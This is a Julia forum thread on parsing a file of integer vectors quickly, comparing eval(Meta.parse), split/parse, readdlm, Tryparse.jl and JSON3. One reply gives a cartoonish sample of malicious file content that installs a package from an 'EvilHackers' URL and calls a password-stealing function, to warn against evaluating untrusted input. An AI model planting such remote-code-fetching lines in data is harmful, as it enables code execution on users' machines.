Parsing a vector of vectors with Meta.parse?

Leo_I · February 15, 2024, 10:38pm

I have a concrete problem, where Meta.parse(line) is unbearably slow.

My use-case is that I have a long .txt file, in which each line has the form
[x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was

output = Vector{Int}[]
open(file, "r") do io
    for line in eachline(io)
        push!(output, eval(Meta.parse(line)))
    end
end

What would be a more efficient way of achieving this?

P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.

mbauman · February 15, 2024, 11:01pm

I’ve split this into a new topic and removed the ping to a particular person, since this can be addressed by many folks here.

If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:

using CSV: CSV, Tables
matrix = CSV.read(file, Tables.matrix; header=false)
output = collect(eachrow(matrix))

roflmaostc · February 15, 2024, 11:02pm

Does this work for you?

# /tmp/lel.txt
1 2 3 4 5
9 8 7 6 5
1 2 3 3 4
5 6 7 8 9
1 2 3 4 5


# REPL
julia> using DelimitedFiles

julia> x = readdlm("/tmp/lel.txt")
5×5 Matrix{Float64}:
 1.0  2.0  3.0  4.0  5.0
 9.0  8.0  7.0  6.0  5.0
 1.0  2.0  3.0  3.0  4.0
 5.0  6.0  7.0  8.0  9.0
 1.0  2.0  3.0  4.0  5.0

julia> [x[i, :] for i in axes(x, 1)]
5-element Vector{Vector{Float64}}:
 [1.0, 2.0, 3.0, 4.0, 5.0]
 [9.0, 8.0, 7.0, 6.0, 5.0]
 [1.0, 2.0, 3.0, 3.0, 4.0]
 [5.0, 6.0, 7.0, 8.0, 9.0]
 [1.0, 2.0, 3.0, 4.0, 5.0]

rafael.guerra · February 15, 2024, 11:09pm

Or simply:
collect.(eachrow(x))

rafael.guerra · February 15, 2024, 11:11pm

See related post here.

PS:
without using eval you could do:

str = "[1, 2, 3]"
parse.(Int, split(filter(∉(['[',']']), str), ','))

Leo_I · February 16, 2024, 7:12am

Thank you for creating a new topic.

I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be Vector{Vector{Int}}.

Leo_I · February 16, 2024, 7:17am

@roflmaostc No, the result contains Vector{Float64}s instead of Vector{Int64}s.
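For rectangular data, the Float64 result can be avoided by passing the element type to readdlm. A minimal sketch, assuming whitespace-separated integers and rows of equal length (so it does not cover ragged input); the IOBuffer stands in for a file and the sample data is made up for illustration:

```julia
using DelimitedFiles

# Stand-in for a file on disk; readdlm also accepts a file path here.
io = IOBuffer("1 2 3\n9 8 7\n")

# Passing Int as the second argument makes readdlm return a Matrix{Int}.
x = readdlm(io, Int)

# One Vector{Int} per row of the matrix.
rows = collect.(eachrow(x))
```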

Leo_I · February 16, 2024, 7:22am

Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!

I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.

Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?
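For the two-vector case specifically, finding where the first vector stops can be left to a regular expression that captures each bracketed group. This is only a sketch under the assumption that a line looks like "([3, 2, 1], [3, 2, 1434])" with no nested brackets; parse_ints and parse_vector_pair are hypothetical helper names, not part of any library:

```julia
# Hypothetical helper: parse the comma-separated integers inside one bracket group.
parse_ints(s::AbstractString) = isempty(strip(s)) ? Int[] : parse.(Int, split(s, ','))

# Hypothetical helper: parse a line holding exactly two bracketed integer vectors.
function parse_vector_pair(line::AbstractString)
    # Each match captures the text between one '[' and the next ']'.
    groups = [parse_ints(m.captures[1]) for m in eachmatch(r"\[([^\[\]]*)\]", line)]
    length(groups) == 2 || throw(ArgumentError("expected two bracketed vectors: $line"))
    return (groups[1], groups[2])
end

pair = parse_vector_pair("([3, 2, 1], [3, 2, 1434])")
```

This still relies on a fixed, known shape per line, so it is not a general expression parser.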

Benny · February 16, 2024, 7:51am

In short, no, otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...)):

1. The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
2. One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
3. Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking

import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()

into a file among a batch of other safe files. That was a cartoonish example of malware; a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables pi = [3, 1, 4, 1, 5, 9, 2], or that doesn’t match what your code expects, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.
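Vetting inputs and handling noncompliance gracefully could look roughly like the following. It is a minimal sketch, assuming each valid line is exactly "[x1, ..., xn]" with integer entries; try_parse_line is a hypothetical name, and returning nothing for bad lines is just one possible policy:

```julia
# Hypothetical helper: return a Vector{Int} for a well-formed line, or `nothing` otherwise.
# Nothing in the line is ever evaluated as code.
function try_parse_line(line::AbstractString)
    s = strip(line)
    # Reject anything that is not wrapped in a single pair of square brackets.
    (length(s) >= 2 && startswith(s, '[') && endswith(s, ']')) || return nothing
    inner = strip(chop(s; head=1, tail=1))
    isempty(inner) && return Int[]
    values = Int[]
    for token in split(inner, ',')
        v = tryparse(Int, token)      # `nothing` when the token is not an integer
        v === nothing && return nothing
        push!(values, v)
    end
    return values
end
```

With this, a line such as pi = [3, 1, 4] or Float64[1.0, 2.0, 3.0] is rejected rather than executed, and the caller decides whether to skip it, log it, or throw.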

roflmaostc · February 16, 2024, 9:48am

Yes, but just because my file contained integers and not floats.

thofma · February 16, 2024, 1:29pm

Shameless self-plug (using Tryparse.jl, thofma/Tryparse.jl on GitHub: parsing basic types in Julia):

julia> using Tryparse

julia> Tryparse.parse(Vector{Int}, "[3, 2, 1]")
3-element Vector{Int64}:
 3
 2
 1

julia> Tryparse.parse(Vector{Vector{Int}}, "[[1, 2], [3, 4, 1]]")
2-element Vector{Vector{Int64}}:
 [1, 2]
 [3, 4, 1]

julia> Tryparse.parse(Tuple{Vector{Int}, Vector{Int}}, "([3, 2, 1], [3, 2, 1434])")
([3, 2, 1], [3, 2, 1434])

So you can just keep your original format.

Edit: This is free of eval.

bertschi · February 16, 2024, 5:54pm

From what I understand, your format should be valid JSON, i.e., you could just parse it like

using JSON3

# Build sample input: one vector per line, with lengths 2 through 8.
s = join(string.([randn(i) for i = 2:8]), "\n");
JSON3.read.(eachline(IOBuffer(s)))

Leo_I · February 16, 2024, 8:12pm

Thank you @bertschi @thofma !

Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).

I guess Benny’s point 1. holds: the more assumptions Julia has, the easier it is to optimize.
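Put together, the manual approach for the whole file might be sketched as follows. It assumes every non-blank line is exactly "[x1, ..., xn]" with integer entries; read_ragged is a hypothetical name, and no timing claims are attached to this particular version:

```julia
# Hypothetical helper: read lines of the form "[x1, ..., xn]" into a Vector{Vector{Int}}.
function read_ragged(io::IO)
    output = Vector{Int}[]
    for line in eachline(io)
        s = strip(line)
        isempty(s) && continue                    # skip blank lines
        inner = strip(chop(s; head=1, tail=1))    # drop the surrounding '[' and ']'
        push!(output, isempty(inner) ? Int[] : parse.(Int, split(inner, ',')))
    end
    return output
end

# Convenience method for a file path.
read_ragged(path::AbstractString) = open(read_ragged, path, "r")

# Usage with an in-memory stand-in for the .txt file:
facets = read_ragged(IOBuffer("[1, 2, 3]\n[4]\n[5, 6]\n"))
```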
